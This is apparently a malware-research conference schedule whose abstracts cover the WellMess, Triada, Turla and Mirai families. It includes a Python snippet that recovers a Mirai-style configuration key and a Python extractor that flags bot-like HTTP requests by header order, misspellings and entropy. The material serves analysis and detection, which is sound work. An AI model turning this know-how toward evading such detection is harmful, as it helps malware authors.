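    dump = build_table(ENTRIES, 0x12345678)     # a "variant" with a new key
    k = recover_key(dump)
    print(f"original effective key 0x{effective_key(ORIGINAL_KEY):02x}, variant 0x{k:02x}")
    print(parse_table(dump, k))
```

The crib is the part to adapt per family: any string the variant must still carry (a busybox invocation, a /proc path, a scanner banner) works, and a family whose dump yields no key for any crib is exactly the signal that the scheme, not just the key, was changed.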


10:40 CET

11:10 CET

Leaving no Stone Unturned – in Search of HTTP Malware Distinctive Features
When we analyze malware C&C network traffic we often see that it contains the HTTP protocol. Sometimes the messages are obfuscated and sometimes sent as plain text. They can be intentionally crafted to look like they were sent by a web browser. But in many cases they are sent using standard libraries and tools. Intuition suggests that there should be some distinct features which can help to distinguish between malware and benign applications sending HTTP requests. In our presentation we want to present the results of our analysis in search of such features.
Analyzed features include headers' appearance (misspellings, unusual names), header values, general payload analysis (entropy, character analysis etc.) and header sequence order. In our search we have analyzed more than 35,000 pcap files from CERT Polska's sandbox environment and the Malware Capture Facility Project. They include network traffic of about 190 malware families, split into common categories like bankers, ransomware, downloaders, spambots etc. To identify distinct features, we have compared the results against browser traffic to Alexa's top 500 popular domains worldwide. The outcome was surprising even for us.

The presentation won't be academic. We want to share the main conclusions, which can help you when dealing with malware HTTP traffic. To provide even more operational knowledge, we want to compare the results with traffic generated by popular Windows HTTP libraries and tools. We will also present particularly interesting examples of HTTP anomalies, both in malware and benign traffic.
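The feature families named above (header misspellings and unusual names, header values, payload entropy, header order) can all be computed from the raw request bytes without any protocol library. The following is an added example, not CERT Polska's code or results: an extractor that records those features and a toy anomaly count against a browser-style baseline. The baseline header list, the two sample requests and the scoring weights are constructed for illustration; misspellings are detected as names one edit (including an adjacent transposition) away from a known header name.

```python
"""Added example, not CERT Polska's code: a feature extractor over raw HTTP
requests covering the points listed above (header order, odd or misspelled
header names, a few values, body entropy) plus a toy anomaly count against a
browser-style baseline.  The baseline header list and both sample requests
are constructed here; the weights are illustrative, not measured."""
import math
from collections import Counter

# Assumed baseline: names a browser commonly sends, and the order in which
# a browser emits the first few of them.
COMMON_HEADERS = {"host", "user-agent", "accept", "accept-language",
                  "accept-encoding", "connection", "content-type",
                  "content-length", "referer", "cookie", "cache-control",
                  "pragma", "upgrade-insecure-requests", "origin", "dnt"}
BROWSER_ORDER = ["host", "user-agent", "accept", "accept-language",
                 "accept-encoding", "connection"]

def parse_request(raw):
    """Split a raw request into request line, ordered headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}

def entropy(data):
    """Shannon entropy in bits per byte."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

def osa_distance(a, b):
    """Optimal string alignment distance (edits plus adjacent transposition),
    so 'Content-Lenght' is one step from 'Content-Length'."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = a[i - 1] != b[j - 1]
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[-1][-1]

def features(req):
    names = [n.lower() for n, _ in req["headers"]]
    values = dict(zip(names, (v for _, v in req["headers"])))
    misspelled, unknown = [], []
    for n in (x for x in names if x not in COMMON_HEADERS):
        close = [c for c in COMMON_HEADERS if osa_distance(n, c) == 1]
        (misspelled if close else unknown).append(n)
    seen = [n for n in names if n in BROWSER_ORDER]
    return {
        "version": req["version"],
        "missing_host": "host" not in names,
        "user_agent": values.get("user-agent", ""),
        "misspelled": misspelled,
        "unknown": unknown,
        "browser_order": seen == [n for n in BROWSER_ORDER if n in seen],
        "body_entropy": round(entropy(req["body"]), 2),
    }

def anomaly_score(f):
    """Count of indicators; illustrative, not a trained model."""
    return sum([f["version"] == "HTTP/1.0", f["missing_host"], not f["user_agent"],
                bool(f["misspelled"]), bool(f["unknown"]),
                not f["browser_order"], f["body_entropy"] > 3.5])

# Constructed samples (not captured traffic).
BROWSER = (b"GET / HTTP/1.1\r\nHost: www.example.com\r\n"
           b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0\r\n"
           b"Accept: text/html,application/xhtml+xml\r\nAccept-Language: en-US,en;q=0.5\r\n"
           b"Accept-Encoding: gzip, deflate\r\nConnection: keep-alive\r\n\r\n")
BOT = (b"POST /gate.php HTTP/1.0\r\nUser-Agent: Mozilla/4.0\r\nHost: 198.51.100.23\r\n"
       b"Content-Lenght: 16\r\nX-Id: 7f1a\r\nContent-Type: application/octet-stream\r\n\r\n"
       + bytes(range(0x80, 0x90)))

if __name__ == "__main__":
    for label, raw in (("browser", BROWSER), ("bot", BOT)):
        f = features(parse_request(raw))
        print(label, anomaly_score(f), f)
```

Header order is the feature that survives a copied User-Agent string: a bot that imitates a browser's UA but emits User-Agent before Host still fails the order check, and the same ordering fingerprint is what lets a request be attributed to a specific Windows HTTP library rather than to a browser.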


11:50 CET

Let’s Go with a Go RAT!
The Go language (Golang) is an open source programming language developed by Google Inc. in 2009, and it can be run on various platforms such as Linux, Mac, Windows and Android.
Speaking of malware using Golang, Mirai is one of the famous ones (it is used for the C2 program), but malware such as Encriyoko, Lady, GoARM.Bot, Go Athena RAT and others have also been confirmed.
However, we can't say that Golang is commonly used as a development basis for malware coding when looking at its share of popular malware.

In this presentation, we would like to introduce the analysis results of a new malware, which we call "WellMess", that was coded in Golang for multiple operating systems. This malware was used in several incident cases that we confirmed from January 2018; we recognize it as a new malware based on our team's analysis and the traffic generated by its communication with the C2 servers.
Additionally, we will explain the reverse engineering of the WellMess malware and demonstrate its botnet operation.


Yoshihiro ISHIKAWA

Cyber Threat Analyst, LAC
Yoshihiro Ishikawa is a member of the Cyber Emergency Center of LAC, where he has been engaged in malware analysis and cyber threat intelligence. He is especially involved in analyzing incidents of Advanced Persistent Threat (APT) attacks. He has presented at APCERT and HITCON. He is also currently...

Shinichi NAGANO

LAC Co.,Ltd.
Shinichi Nagano is a member of the Cyber Emergency Center with a background as a Network Forensic Analyst, and he has now joined LAC's malware analysis team, where, along with the malware analysts, he has analyzed various malware and network logs, especially for threat incidents.

12:20 CET

Tracking Actors through their Webinjects
Webinjects have been a feature of banking malware ever since they were popularised with great success by early families such as Zeus. In that time, writing Webinjects has become a highly specialized skill, with off-the-shelf Webinjects systems becoming as popular as the banking malware itself.

Webinjects are used to deploy Automated Transfer Systems, payment card data harvesters, session hijackers, and even to deploy web based crypto-currency miners. With some vendors in operation for over five years, the area of Webinjects development appears to be a lucrative and potentially long-lived occupation.

This presentation explores prevalent Webinjects systems, their capabilities and which malware families are deploying them, and how we can use Webinjects to track actors as they switch between using different malware families. We present details of the criminal groups we have discovered this way.


13:00 CET

14:00 CET

Triada: the Past, the Present, the (Hopefully not Existing) Future
Triada is an Android threat that has been known within the malware research field for a couple of years. Despite that, it still remains a very interesting threat, as its authors did something very rarely seen in any malicious software: instead of evading detection, they embraced it. Triada was first detected preinstalled on the system image of some low-end Android devices in mid-2017.

As soon as we detected these applications, we reached out to OEM partners to address this threat and we gained a unique insight into Triada’s evolution and tactics. This presentation will cover Google Play Protect’s findings and present previously unrevealed aspects of Triada and the extent to which it backdoored OEM system images. We will also cover how our unprecedented coordination with OEMs led us to update system images across the Android ecosystem.


Łukasz Siewierski

Reverse Engineer, Google
Łukasz is a Reverse Engineer on the Android Security team at Google, where he takes apart malware and figures out how to stop it from working. Previously he was taking apart security incidents at the .pl domain registry, figuring out how to prevent them from happening in the future...

14:45 CET

The Snake Keeps Reinventing Itself
After having tracked Turla's activities for several years, we now have a unique understanding of their Tools, Tactics and Procedures (TTPs). In this talk, we would like to share this knowledge to help defenders protect their networks.

Turla is an espionage group known for targeting governments, diplomats and militaries all around the world. One of their first documented campaigns was against the US military ten years ago, and they are still very active. During this presentation, we will discuss some recent public cases involving Turla operators. This threat actor targets very specific groups of people and, as such, uses advanced targeting techniques such as spear phishing and watering holes to go after them.

We will present an in-depth analysis of currently undocumented components, such as a highly resilient Outlook backdoor, allegedly used in the early-2018 attack against the German government. We will also provide an overview of the different changes in their TTPs that occurred in the past few months.


Matthieu Faou

Malware Researcher, ESET
Matthieu Faou is a malware researcher at ESET where he performs in-depth analysis of malware. He finished his Master’s degree in computer science at École Polytechnique de Montréal and at École des Mines de Nancy in 2016. In the past, he has presented at conferences such as BlueHat...

15:30 CET

How many Mirai variants are there?
Mirai was open-sourced soon after overwhelming several high-profile targets including Krebsonsecurity, OVH, and DYN in Autumn 2016, which led to a proliferation of Mirai variants in the past 2 years. To better fight Mirai botnets, effective variant classification schemes are necessary. Currently, Mirai variants are usually classified by their branch names (e.g., JOSHO, OWARI, MASUTA), which come from a command line of “/bin/busybox <branch>” found in the Mirai sample. While the default name is “MIRAI”, the <branch> is usually replaced with a name chosen by the author (e.g., MASUTA, SATORI, SORA) in later variants.
However, we think the branch-based classification scheme is too coarse-grained to reveal: 1) the variances within a single variant across different stages, and 2) the connections among different branches. In this talk, we would like to present our classification schemes derived from 32K+ collected samples and 1,000+ extracted CNCs. Our schemes are mainly based on the data of configurations, supported attack methods, and credential dictionaries, which are all extracted from the samples. For example, we successfully classify Mirai samples into 106 variants based on the combination of supported attack methods. We also successfully connected multiple branches based on the keys used in configuration encryption. To summarize, the content of this talk is as follows:
1) We will demonstrate the idea of automatically extracting configurations, supported attack methods, and credential dictionaries from samples for classification purposes.
2) We will propose a fingerprint technique to recognize Mirai attack methods (e.g., syn_flood, http_flood) with information extracted from samples, without reverse engineering work.
3) We will introduce a set of classification schemes based on the extracted data, and will investigate popular Mirai branches with the proposed schemes.

It’s worth mentioning that since the data used is processor-independent (e.g., x86, x64, ARM, MIPS, SPARC, PowerPC), our schemes can classify the same variant’s samples even if they are built for different CPU architectures.



Qihoo 360
Botnet researcher @ Network Security Research Lab, Qihoo 360

Hui Wang

Qihoo 360

16:00 CET

Closing ceremony
Éric FREYSSINET

Chairman / Head of the national focal point on cyberthreats, Botconf / Gendarmerie nationale
Chairman of the organising committee. French law enforcement cybercrime specialist. PhD in computer science.